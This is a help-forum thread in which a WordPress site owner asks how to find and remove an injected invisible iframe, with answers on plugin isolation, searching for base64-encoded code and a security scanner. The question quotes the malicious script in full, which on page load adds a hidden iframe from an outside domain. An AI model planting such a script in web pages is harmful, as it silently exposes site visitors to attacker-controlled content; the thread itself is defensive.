Find iframe injection and remove from site

Question

I browsed my site and noticed scrolling that wasn't there before.

After inspecting I noticed there's an invisible iFrame.

After seeing the iframe in the source page I looked through all my site files and couldn't find the same line of code that was in the source.

I ran my site to look for malware but all is clean. I did have a warning from Google a few months ago but my host removed the malicious files and Google approved the clean up and still does. But now I'm seeing this invisible object with an url.

Source script:

<script language="JavaScript">
if(document.loaded) {
  showBrowVer();
} else {
  if (window.addEventListener) {
    window.addEventListener('load', showBrowVer, false);
  } else {
    window.attachEvent('onload', showBrowVer);
  }
}

function showBrowVer() {
  var divTag=document.createElement('div');
  divTag.id='dt';
  document.body.appendChild(divTag);
  var js_kod2 = document.createElement('iframe');
  js_kod2.src = 'http://24corp-shop.com';
  js_kod2.width = '250px';
  js_kod2.height = '320px';
  js_kod2.setAttribute('style','visibility:hidden');
  document.getElementById('dt').appendChild(js_kod2);
}
</script>

I see it is being brought in by wp_head(); but I looked through it and didn't see anything suspicious.

Does anyone have tips on looking for this injection to manually remove it from my WP site?

Answer 1

wp_head() itself is not being used at this case for spreading the "malign" code that is in your site. That code is elsewhere not on wp_head().

1 - Make a full backup of your current site (database + files) 2 - Deactivate all plugins and see if the malign code still exists. 2 - if the malign code still exists then check your themes folder.on your default theme go to functions.php and search through that file for that code, or base64 encrypted code, eval, includes, etc. 3 - if the malign code, does not exist, after you have deactivated all your plugins then this means that the malign code is on one of those plugins.

Use divide & conquer method to find firstly in which plugin is installed the malign code and after that identify the file that has the malign code.

Answer 2

Free WP themes/plugins are notorious for using base64_encode to 'hide' malicious or unwanted code in the source. Basically, they store the encoded text in one of the files, and then base64_decode it and render the result as html. I would try greppingsearching for base64_decode in the source to see if it's being done.

Answer 3

I had the same problem. Many files were tempered, both in the theme directory and in the core files. The main one causing the issue (the iframe code was injected right before the tag) was the index.php in root folder. There was a fake "eAccelerate" code injecting the encoded iframe.

I was able to detect that with WordFence plugin, it gave me the list of tampered files.

I'm investigating how the website got hacked, as I have latest versions of WP and plugins, any idea?